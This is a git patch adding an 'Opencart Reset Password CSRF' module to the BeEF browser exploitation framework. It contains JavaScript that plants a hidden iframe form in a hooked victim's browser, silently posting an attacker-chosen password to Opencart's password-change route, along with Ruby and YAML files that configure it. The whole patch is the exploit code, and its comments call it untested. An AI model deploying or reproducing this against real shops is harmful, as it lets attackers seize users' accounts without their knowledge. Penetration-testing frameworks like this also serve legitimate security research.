From 59951959f18568b2dec4a22933cd7e0d4557da85 Mon Sep 17 00:00:00 2001 From: bcoles Date: Fri, 19 Apr 2013 09:18:05 +0930 Subject: [PATCH] Add Opencart password reset CSRF module This module hasn't been tested against an Opencart instance --- .../opencart_reset_password/command.js | 24 +++++++++++++++++++ .../opencart_reset_password/config.yaml | 15 ++++++++++++ .../opencart_reset_password/module.rb | 20 ++++++++++++++++ 3 files changed, 59 insertions(+) create mode 100644 modules/exploits/opencart_reset_password/command.js create mode 100644 modules/exploits/opencart_reset_password/config.yaml create mode 100644 modules/exploits/opencart_reset_password/module.rb diff --git a/modules/exploits/opencart_reset_password/command.js b/modules/exploits/opencart_reset_password/command.js new file mode 100644 index 000000000..54747a048 --- /dev/null +++ b/modules/exploits/opencart_reset_password/command.js @@ -0,0 +1,24 @@ +// +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.execute(function() { + var base = '<%= @base %>'; + var password = '<%= @password %>'; + + var opencart_reset_password_iframe = beef.dom.createIframeXsrfForm(base, "POST", [ + {'type':'hidden', 'name':'password', 'value':password}, + {'type':'hidden', 'name':'confirm', 'value':password} + ]); + + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); + + cleanup = function() { + document.body.removeChild(opencart_reset_password_iframe); + } + setTimeout("cleanup()", 15000); + +}); + diff --git a/modules/exploits/opencart_reset_password/config.yaml b/modules/exploits/opencart_reset_password/config.yaml new file mode 100644 index 000000000..16ccacece --- /dev/null +++ b/modules/exploits/opencart_reset_password/config.yaml @@ -0,0 +1,15 @@ +# +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +beef: + module: + opencart_reset_password: + enable: true + category: "Exploits" + name: "Opencart Reset Password CSRF" + description: "Attempts to reset an Opencart user's password." + authors: ["Saadat Ullah", "bcoles"] + target: + unknown: ["ALL"] diff --git a/modules/exploits/opencart_reset_password/module.rb b/modules/exploits/opencart_reset_password/module.rb new file mode 100644 index 000000000..569c2bc2c --- /dev/null +++ b/modules/exploits/opencart_reset_password/module.rb @@ -0,0 +1,20 @@ +# +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +# This module has not been tested +class Opencart_reset_password < BeEF::Core::Command + + def self.options + return [ + { 'name' => 'base', 'ui_label' => 'Opencart path', 'value' => 'http://example.com/index.php?route=account/password'}, + { 'name' => 'password', 'ui_label' => 'Password', 'value' => 'beefbeef'} + ] + end + + def post_execute + save({'result' => @datastore['result']}) + end + +end